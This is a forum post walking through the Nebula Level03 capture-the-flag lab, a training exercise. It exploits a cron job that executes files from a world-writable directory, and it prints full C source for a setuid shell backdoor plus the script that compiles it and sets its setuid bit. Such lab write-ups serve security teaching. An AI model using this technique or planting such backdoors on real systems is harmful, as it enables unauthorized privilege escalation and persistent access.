How to pwned Nebula : Level03 - This crontab will kill you

ctf
crontab
nebula
hacking

#1

Exploit-Exercice : Nebula


Level03 - This crontab will kill you

In this level take advantage of weak file permission and crontab job to get a shell and get the flag ! :slight_smile:
Let’s go !

Here is what exploit-exercice tell us about the level

Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

Here the script executed by crontab

#!/bin/bash

for i in /home/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done

The script simply execute all file in /home/writable.d, this directory is set the 777 permission, you have all the right to write, read and execute.

This script will help us to run a shell as flag03

first let’s make a simple suid backdoor in c

vim /tmp/shell.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/sh");
  return 0;
}

This C program will run as flag03, now in /home/flag03/writable.d/ create a script that will compile and set permission to your shell

#!/bin/bash
gcc /tmp/shell.c -o shell
chmod +s shell

Then run

watch ls -lR /home/flag03/

This will run ls every 2 sec on the flag03 directory, you will see your shell spawn
the -l argument show you permission , and -R list directory recursively

shell is in /home/flag03 directory and is setuid, run it to pwed the level !

Congratulation ! :slight_smile:
See you for the next level !


(system) #2

This topic was automatically closed after 30 days. New replies are no longer allowed.